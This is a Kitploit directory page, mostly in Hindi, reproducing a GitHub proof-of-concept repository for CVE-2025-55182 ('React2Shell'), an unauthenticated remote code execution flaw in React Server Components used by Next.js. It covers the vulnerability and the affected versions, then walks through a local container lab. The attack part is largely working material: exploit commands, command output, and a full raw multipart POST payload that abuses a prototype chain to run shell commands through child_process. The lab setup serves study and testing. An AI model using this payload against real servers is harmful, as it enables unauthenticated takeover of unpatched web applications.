Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 — React2Shell | Kitploit
उपकरण/GitHubGitHub/ryosukedtomita/cve-2025-55182
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubryosukedtomita/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 — React2Shell

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2025-55182 — React2Shell

NOLICENSE

INDEX

  • ABOUT
  • ENVIRONMENT
  • HOW TO USE

ABOUT

CVE‑2025‑55182 ("React2Shell") React Server Components के Flight प्रोटोकॉल डीसीरियलाइज़र में मौजूद CVSS 10.0 की बिना प्रमाणीकरण के RCE कमज़ोरी है।

कमज़ोरी का सारांश

React के Flight प्रोटोकॉल क्लाइंट के अंदर reviveModel फ़ंक्शन ऑब्जेक्ट कुंजियों को hasOwnProperty से सत्यापित नहीं करता, जिससे हमलावर __proto__ → constructor → Function constructor की प्रोटोटाइप श्रृंखला का अनुसरण करके मनमाना JavaScript चला सकता है।

Next-Action हेडर के साथ एक multipart POST के माध्यम से प्रमाणीकरण से पहले डीसीरियलाइज़ेशन होता है, इसलिए बिना प्रमाणीकरण के हमला किया जा सकता है।

प्रभावित दायरा

कम्पोनेंटकमज़ोर संस्करणसुधार संस्करण
React19.0.0 – 19.2.019.2.1
Next.js≤ 16.0.616.0.7

ENVIRONMENT

संरचना

root@kitploit:~
CVE-2025-55182/
├── flake.nix          # Nix dev shell (nodejs_20, yarn, python3+requests)
├── poc.py             # エクスプロイトスクリプト
└── target/            # 脆弱な Next.js アプリ
    ├── Containerfile  # podman ビルド用
    ├── package.json   # [email protected] / [email protected]
    ├── next.config.ts
    ├── tsconfig.json
    └── app/
        ├── layout.tsx
        └── page.tsx

निर्भरता उपकरण

  • Nix — पुनरुत्पादनीय विकास वातावरण
  • podman — कंटेनर रनटाइम
  • Python 3 + requests — PoC निष्पादन

HOW TO USE

1. विकास शेल प्रारंभ करें

root@kitploit:~
nix develop

2. कंटेनर बनाएं

root@kitploit:~
podman build -t cve-2025-55182 target/

3. कमज़ोर सर्वर प्रारंभ करें

root@kitploit:~
podman run -d -p 3000:3000 --name vuln cve-2025-55182

4. एक्सप्लॉइट चलाएँ

root@kitploit:~
python poc.py http://localhost:3000 "id"

प्रतिक्रिया JSON के digest फ़ील्ड में कमांड निष्पादन परिणाम वापस आता है।

root@kitploit:~
[*] Target: http://localhost:3000/
[*] Command: id
[*] Sending exploit payload...
[*] Response status: 200
[+] Command output: uid=1000(node) gid=1000(node) groups=1000(node)

5. दुष्प्रभाव की जाँच करें

root@kitploit:~
# ファイル書き込み
python poc.py http://localhost:3000 "touch /tmp/pwned"

# コンテナ内で確認
podman exec -it vuln sh
# => ls /tmp/pwned
podman exec -it vuln sh -c "ls /tmp" # こっちでも可能

Burp Suite से पुष्टि करने का तरीका

localhost:8080 पर Burp चल रहा है मानते हुए

root@kitploit:~
HTTPS_PROXY=http://localhost:8080 HTTP_PROXY=http://localhost:8080 python poc.py http://localhost:3000 "id"
root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Next-Action: x
Content-Length: 580
Content-Type: multipart/form-data; boundary=19a7dba25a68483f4234c90a07a425a2

--19a7dba25a68483f4234c90a07a425a2
Content-Disposition: form-data; name="0"

{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B0\"}", "_response": {"_prefix": "var res = process.mainModule.require('child_process').execSync(\"touch /tmp/pwand\",{'timeout':5000}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", "_formData": {"get": "$1:constructor:constructor"}}}
--19a7dba25a68483f4234c90a07a425a2
Content-Disposition: form-data; name="1"

"$@0"
--19a7dba25a68483f4234c90a07a425a2--

6. सफाई

root@kitploit:~
podman stop vuln && podman rm vuln
टूल डाउनलोड करें